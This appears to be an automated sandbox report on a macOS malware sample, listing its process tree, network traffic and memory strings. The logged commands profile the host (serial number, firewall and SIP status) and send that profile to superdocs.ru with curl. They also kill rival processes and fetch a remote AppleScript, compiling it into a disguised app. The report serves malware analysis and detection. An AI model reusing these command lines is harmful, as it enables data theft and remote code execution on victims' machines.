Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist \| grep 'https' -b3 \|awk 'NR==3 {split($4, arr, '\'') print arr[2]}') \|\| echo 'com.apple.safari'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/plutil
Arguments:	plutil -p /Users/pedro/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
File size:	270832 bytes
MD5 hash:	11427a2425049a93a60e85d61c9c0081

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/grep
Arguments:	grep https -b3
File size:	202816 bytes
MD5 hash:	99be09a23ac46af2879dc015993ca389

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk NR==3 {split($4, arr, '\'') print arr[2]}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c defaults read loginwindow SystemVersionStampAsString
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/defaults
Arguments:	defaults read loginwindow SystemVersionStampAsString
File size:	205376 bytes
MD5 hash:	4e146d0cf6ed8b4592347198fc2a990c

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/defaults
Arguments:	defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
File size:	205376 bytes
MD5 hash:	4e146d0cf6ed8b4592347198fc2a990c

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/sbin/ioreg
Arguments:	ioreg -c IOPlatformExpertDevice -d 2
File size:	189696 bytes
MD5 hash:	d03e2df1848ceb731ba4a8c3e82b2011

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:55
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c defaults read /Library/Preferences/com.apple.alf globalstate
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:55
Start date:	24/08/2022
Path:	/usr/bin/defaults
Arguments:	defaults read /Library/Preferences/com.apple.alf globalstate
File size:	205376 bytes
MD5 hash:	4e146d0cf6ed8b4592347198fc2a990c

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c csrutil status \| grep -q enabled && echo 1 \|\| echo 0
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/csrutil
Arguments:	csrutil status
File size:	380928 bytes
MD5 hash:	51e2d23508016b3dba2263fd13f74859

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/grep
Arguments:	grep -q enabled
File size:	202816 bytes
MD5 hash:	99be09a23ac46af2879dc015993ca389

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c sysctl -n machdep.cpu.brand_string
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/sbin/sysctl
Arguments:	sysctl -n machdep.cpu.brand_string
File size:	151680 bytes
MD5 hash:	340b13a50d8ee5cfcc91d8480aa5cbe6

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/sbin/ioreg
Arguments:	ioreg -c IOPlatformExpertDevice -d 2
File size:	189696 bytes
MD5 hash:	d03e2df1848ceb731ba4a8c3e82b2011

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/ps
Arguments:	ps aux
File size:	203504 bytes
MD5 hash:	48b7f71ab3866eee46d3ef67f8233168

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/grep
Arguments:	grep -E com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede
File size:	202816 bytes
MD5 hash:	99be09a23ac46af2879dc015993ca389

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/grep
Arguments:	grep -v grep
File size:	202816 bytes
MD5 hash:	99be09a23ac46af2879dc015993ca389

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk {print $2}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:56
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:56
Start date:	24/08/2022
Path:	/usr/bin/xargs
Arguments:	xargs kill -9
File size:	168768 bytes
MD5 hash:	8f884810645d2a6e0b1a4d499993857c

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/usr/sbin/ioreg
Arguments:	ioreg -c IOPlatformExpertDevice -d 2
File size:	189696 bytes
MD5 hash:	d03e2df1848ceb731ba4a8c3e82b2011

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c echo ~/Library/Caches/GitServices/.rep
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' \|\| echo 9999999999
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/date
Arguments:	date -r /Users/pedro/Library/Caches/GitServices/.rep +%s
File size:	168112 bytes
MD5 hash:	9983eb16b31b7224ae79b51b2b49ee75

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c date +'%s'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/date
Arguments:	date +%s
File size:	168112 bytes
MD5 hash:	9983eb16b31b7224ae79b51b2b49ee75

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' \|\| echo '0'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:59
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Source: /usr/bin/curl (PID: 979)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 982)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1034)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1043)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1067)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1078)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1086)	Writes from socket in process: data	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 49351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49339
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49338
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49358
Source: unknown	Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49357
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49349

Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: applet, 00001023.00000508.1.0000000113511000.0000000113cdb000.r--.sdmp	String found in binary or memory: http://www.apple.com/Copyright
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp, CodeResources.469.dr, com.apple.spx.plist.495.dr, Info.plist.468.dr, Info.plist.475.dr, sh-thd-4984109211.494.dr	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: a.537.dr	String found in binary or memory: https://superdocs.ru/l
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0

Source: /usr/bin/curl (PID: 979)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 982)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1034)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1043)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1067)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1078)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1086)	Reads from socket in process: data	Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: melindas.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /sys/prepod.php HTTP/1.1Host: melindas.ruUser-Agent: curl/7.79.1Accept: /X-Usr: pedro
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/payload.php?serial=C07GV0KZPJH8&user=pedro&hash=&display_state=off HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons.php?icon=Reminders HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
